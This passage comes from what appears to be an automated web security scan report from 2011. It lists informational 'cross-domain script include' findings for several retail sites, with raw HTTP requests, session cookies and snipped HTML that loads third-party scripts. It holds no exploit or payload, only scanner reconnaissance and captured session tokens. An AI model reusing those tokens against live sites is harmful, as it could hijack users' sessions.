Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 10:32:33 GMT
X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- MyBuys setup files -->
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="http://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.37. http://www.gnc.com/community/index.jsp%20%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /community/index.jsp%20%20

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/index.jsp%20%20 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:16:24 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=f5hHNQ5YYHfFrLKw6fkW4j6LhJpz8ZYLdnCQyDkP3DhhtWxJ2d2l!1363466968; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81483


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://GNC.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://GNC.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://eval.bizrate.com/js/survey_126457_1.js"></script>
...[SNIP]...
<!--You are running on ashprd2_ws_65_3-->


<script src="http://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

18.38. http://www.gnc.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:11 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114194


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://GNC.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://GNC.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
<td height="111"><script type="text/javascript" src="http://web.aisle7.net/jsapi/1.0/content.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://eval.bizrate.com/js/survey_126457_1.js"></script>
...[SNIP]...
<!--You are running on ashprd2_ws_64_2-->


<script src="http://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

18.39. https://www.gnc.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /checkout/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/index.jsp?process=orderTrackingLogin HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:14 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 93720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/10040766/csgather.js'></script>
...[SNIP]...
<!--You are running on ashprd2_ws_64_2-->


<script src="https://media.gsimedia.net/tg/gsiutt/store76.js"></script>
...[SNIP]...

18.40. http://www.guitarcenter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?CJAID=10453836&CJPID=2537521 HTTP/1.1
Host: www.guitarcenter.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; CjPID=2537521; CjAID=10453836; ref=; ref_d=5/15/2011 9:40:10 PM; source=4ACJWXX2; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; UNICASOURCE=4ACJWXX2; UNICASOURCEL=4ACJWXX2; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; mbox=check#true#1305510080|session#1305510019406-714170#1305511880|PC#1305510019406-714170.17#1308102028; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 16 May 2011 01:53:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: CjPID=2537521; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: CjAID=10453836; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: source=4ACJWXX2; path=/
Set-Cookie: UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Set-Cookie: UNICASOURCEL=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 01:53:36 GMT; path=/
Vary: Accept-Encoding
Content-Length: 217584


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...
<!-- NEW FOR HISTORY BLOCK -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
<br><script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0009/8956.js"></script>
...[SNIP]...

18.41. https://www.guitarcenter.com/MyAccount/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.guitarcenter.com
Path:   /MyAccount/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:11:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 32
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 27444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/includes/guitarcenter/GuitarCenter.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

18.42. http://www.helzberg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helzberg.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=67638cb10049a42429ba4a456b90.helzberg-b2c-i4; customer=none; basket=none; __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmb=140079658; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305510061756_802948","pv":1,"to":3,"c":"http://www.helzberg.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: JSP/2.1
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 01:53:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:53:53 GMT
Connection: close
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 01:53:53 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 01:53:53 GMT; Path=/
Content-Length: 37928


   
...[SNIP]...
<!-- spotlight tag in bottomnav - begin For Non-Checkout Pages -->
       
       
                                        <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
   
   
                                                   <script language='javascript' src='https://dsa.csdata1.com/data/js/1066060/edata1.js'></script>
...[SNIP]...
<td valign="middle">
                       <script src=https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO></script>
...[SNIP]...

18.43. https://www.helzberg.com/account/login.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /account/login.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511291580}; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA; JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: JSP/2.1
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Mon, 16 May 2011 10:45:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:10 GMT
Connection: keep-alive
Set-Cookie: customer=none; Expires=Wed, 29-May-2013 10:45:10 GMT; Path=/
Set-Cookie: basket=none; Expires=Mon, 30-May-2011 10:45:10 GMT; Path=/
Content-Length: 39770


       
...[SNIP]...
<!-- google analytics tag insert -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
   
   
                                                   <script language='javascript' src='https://dsa.csdata1.com/data/js/1066060/edata1.js'></script>
...[SNIP]...
<td valign="middle">
                       <script src=https://seal.verisign.com/getseal?host_name=www.helzberg.com&size=S&use_flash=NO&use_transparent=NO></script>
...[SNIP]...

18.44. http://www.homedepot.ca/catalog/concrete/173198

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /catalog/concrete/173198

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /catalog/concrete/173198 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; jsEnabled=1; ResonanceSegment=1; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d15%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm","pv":3,"lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305511204415}; s_v14=English; s_sq=homedepotca%3D%2526pid%253Dcreate%252520an%252520account%2526pidt%253D1%2526oid%253DfeelGoodNav%25253ABuilding%252520Materials%25253AConcrete%2525C2%2525A0(21)%25250A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 10:39:30 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 10:39:29 GMT
Content-Length: 103806


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<!--
       By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/.
       -->
       
       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>
       
               
       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

18.45. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /webapp/wcs/stores/servlet/Home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:53:26 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 09:19:01 GMT
Content-Length: 95123


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<!--
       By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/.
       -->
       
       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>
       
               
       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

18.46. http://www.orientaltrading.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orientaltrading.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.orientaltrading.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; mt.v=1.322159034.1305510206640; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; fsr.s={"v":1,"rid":"1305510222528_763877","pv":1,"to":3,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:38 GMT
Connection: close
Content-Length: 98049


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.47. http://www.petco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
